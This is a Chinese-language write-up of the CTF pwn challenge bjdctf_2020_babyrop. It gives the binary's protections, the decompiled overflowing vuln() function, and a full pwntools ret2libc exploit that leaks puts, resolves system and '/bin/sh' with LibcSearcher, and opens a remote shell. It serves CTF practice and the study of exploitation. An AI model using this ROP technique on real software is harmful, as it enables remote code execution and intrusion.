解题思路:
泄露或修改内存数据:
- 堆地址:无需
- 栈地址:无需
- libc地址:[[利用got表和plt表泄露数据]] puts
- BSS段地址:无需
劫持程序执行流程:[[ret2text(栈溢出的gadgets利用)]]
获得shell或flag:[[调用libc中的system]]
学到的知识:
[[LibcSearcher的使用]]
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file bjdctf_2020_babyrop
bjdctf_2020_babyrop: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ebe33bb41cb0dcdde518b9dfb38eb03a104ee0b7, not stripped
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=bjdctf_2020_babyrop
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 73) Symbols No 0 1 bjdctf_2020_babyrop
libc版本:
wp借鉴:
核心伪代码分析:
存在利用的的代码:
ssize_t vuln()
{
char buf[32]; // [rsp+0h] [rbp-20h] BYREF
puts("Pull up your sword and tell me u story!");
return read(0, buf, 0x64uLL);
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
init(argc, argv, envp);
vuln();
return 0;
}
分析:
一个简单的栈溢出构造ROP链!
脚本:
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64',os='linux')
pwnfile='./bjdctf_2020_babyrop'
sh=remote('node4.buuoj.cn',28172)
elf = ELF(pwnfile)
#sh=process(pwnfile)
#gdb.attach(sh)
#pause()
main_addr=0x4006AD
pop_rdi_ret=0x400733
#利用栈溢出泄漏地址
payload=b'a'*0x28+p64(pop_rdi_ret)+p64(elf.got["puts"])+p64(elf.plt["puts"])+p64(main_addr)
sh.recvuntil(b"story!\n")
sh.sendline(payload)
puts_addr=u64(sh.recv(6).ljust(8,b'\x00'))
print("puts:",hex(puts_addr))
#远程
#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型
obj = LibcSearcher("puts", puts_addr)
puts_offest=obj.dump("puts") #write 偏移
system_offest=obj.dump("system") #system 偏移
bin_sh_offest=obj.dump("str_bin_sh") #/bin/sh 偏移
base_addr=puts_addr-puts_offest
print("base_addr:",hex(base_addr))
bin_sh_addr=base_addr+bin_sh_offest
print("bin_sh_addr:",hex(bin_sh_addr))
system_addr=base_addr+system_offest
print("system_addr:",hex(system_addr))
payload1=b'a'*0x28+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(system_addr)
sh.recvuntil(b"story!\n")
sh.send(payload1)
sh.interactive()